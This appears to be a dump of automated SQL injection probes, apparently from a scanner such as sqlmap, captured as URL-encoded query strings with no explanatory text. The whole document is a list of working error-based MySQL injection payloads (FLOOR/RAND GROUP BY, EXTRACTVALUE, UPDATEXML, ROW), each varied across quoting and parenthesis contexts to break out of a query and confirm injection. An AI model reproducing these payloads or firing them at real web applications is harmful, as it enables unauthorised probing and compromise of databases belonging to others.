-8576%27%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27aPSM%27%3D%27aPSM -9271%27%29%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27xyCz%27%20LIKE%20%27xyCz -1025%27%29%29%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%27ryxT%27%20LIKE%20%27ryxT -8312%27%29%29%29%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%27hHqE%27%20LIKE%20%27hHqE -4514%27%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27Byyy%27%20LIKE%20%27Byyy -2586%22%29%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22pLUk%22%3D%22pLUk -2285%22%29%29%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22XDxP%22%3D%22XDxP -5327%22%29%29%29%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22xCkK%22%3D%22xCkK -7590%22%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22WDQD%22%3D%22WDQD -8316%22%29%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%22SyZo%22%20LIKE%20%22SyZo -2805%22%29%29%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%22Vmih%22%20LIKE%20%22Vmih -8059%22%29%29%29%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%28%28%22YkIN%22%20LIKE%20%22YkIN -4531%22%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%22wKEE%22%20LIKE%20%22wKEE -7287%29%20WHERE%206098%3D6098%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -6032%27%29%20WHERE%207653%3D7653%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -1477%27%20WHERE%205504%3D5504%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 -4345%22%20WHERE%208627%3D8627%20OR%20%28SELECT%207044%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287044%3D7044%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 1%29%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29 1%27%29%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29 1%27%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29 1%22%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29 1%29%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%283730%3D3730 1%29%29%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%286044%3D6044 1%29%29%29%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%28%286232%3D6232 1%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29 1%27%29%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%27Hxgk%27%3D%27Hxgk 1%27%29%29%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%28%27VIYA%27%3D%27VIYA 1%27%29%29%29%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%28%28%27SerD%27%3D%27SerD 1%27%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%27CGcC%27%3D%27CGcC 1%27%29%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%27ktoR%27%20LIKE%20%27ktoR 1%27%29%29%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%28%27cWVy%27%20LIKE%20%27cWVy 1%27%29%29%29%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%28%28%27IXlp%27%20LIKE%20%27IXlp 1%27%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%27waIU%27%20LIKE%20%27waIU 1%22%29%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%22KZfG%22%3D%22KZfG 1%22%29%29%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%28%22BMCD%22%3D%22BMCD 1%22%29%29%29%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%28%28%22YDYG%22%3D%22YDYG 1%22%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%22AbDW%22%3D%22AbDW 1%22%29%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%22IalQ%22%20LIKE%20%22IalQ 1%22%29%29%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%28%22kmLW%22%20LIKE%20%22kmLW 1%22%29%29%29%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%28%28%28%22CbnX%22%20LIKE%20%22CbnX 1%22%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20AND%20%22tXSw%22%20LIKE%20%22tXSw 1%29%20WHERE%206765%3D6765%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29 1%27%29%20WHERE%205581%3D5581%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29 1%27%20WHERE%204550%3D4550%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29 1%22%20WHERE%204518%3D4518%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29 1%27%20%7C%7C%20%28SELECT%205464%20FROM%20DUAL%20WHERE%202384%3D2384%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207214%20WHERE%201390%3D1390%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%207809%20FROM%20DUAL%20WHERE%208837%3D8837%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20%29 1%20%2B%20%28SELECT%205539%20WHERE%204319%3D4319%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20%29 1%27%20%2B%20%28SELECT%20%27XGRm%27%20FROM%20DUAL%20WHERE%206122%3D6122%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27UjTx%27%20WHERE%207999%3D7999%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20OR%20EXTRACTVALUE%285467%2CCONCAT%280x5c%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%285467%3D5467%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%29%20%23 1%29%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29 1%27%29%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29 1%27%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29 1%22%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29 1%29%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20AND%20%283643%3D3643 1%29%29%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20AND%20%28%288703%3D8703 1%29%29%29%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20AND%20%28%28%288455%3D8455 1%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29 1%27%29%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20AND%20%28%27nPAo%27%3D%27nPAo 1%27%29%29%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20AND%20%28%28%27uOMK%27%3D%27uOMK 1%27%29%29%29%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20AND%20%28%28%28%27HGvG%27%3D%27HGvG 1%27%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20AND%20%27DrDG%27%3D%27DrDG 1%27%29%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20AND%20%28%27QsTS%27%20LIKE%20%27QsTS 1%27%29%29%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20AND%20%28%28%27jERV%27%20LIKE%20%27jERV 1%27%29%29%29%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20AND%20%28%28%28%27yVmQ%27%20LIKE%20%27yVmQ 1%27%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20AND%20%27eZXG%27%20LIKE%20%27eZXG 1%22%29%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20AND%20%28%22OXjX%22%3D%22OXjX 1%22%29%29%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20AND%20%28%28%22LuRH%22%3D%22LuRH 1%22%29%29%29%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20AND%20%28%28%28%22yeAI%22%3D%22yeAI 1%22%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20AND%20%22iydm%22%3D%22iydm 1%22%29%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20AND%20%28%22uIYD%22%20LIKE%20%22uIYD 1%22%29%29%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20AND%20%28%28%22JOiM%22%20LIKE%20%22JOiM 1%22%29%29%29%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20AND%20%28%28%28%22ijbc%22%20LIKE%20%22ijbc 1%22%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20AND%20%22iptu%22%20LIKE%20%22iptu 1%29%20WHERE%208067%3D8067%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29 1%27%29%20WHERE%208431%3D8431%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29 1%27%20WHERE%203155%3D3155%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29 1%22%20WHERE%209227%3D9227%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29 1%27%20%7C%7C%20%28SELECT%204137%20FROM%20DUAL%20WHERE%208708%3D8708%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201130%20WHERE%207577%3D7577%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%202198%20FROM%20DUAL%20WHERE%203277%3D3277%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20%29 1%20%2B%20%28SELECT%205623%20WHERE%204703%3D4703%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20%29 1%27%20%2B%20%28SELECT%20%27tBnj%27%20FROM%20DUAL%20WHERE%209489%3D9489%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Mizh%27%20WHERE%207562%3D7562%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20OR%20UPDATEXML%282945%2CCONCAT%280x2e%2C0x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%282945%3D2945%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%29%2C2149%29%20%23 -8796%29%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29 -4428%27%29%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29 -5167%27%20OR%20ROW%287236%2C2503%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6a71613a%2C%28SELECT%20%28CASE%20WHEN%20%287236%3D7236%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a75676a3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207236%20UNION%20SELECT%202503%29a%20GROUP%20BY%20x%20LIMIT%201%29 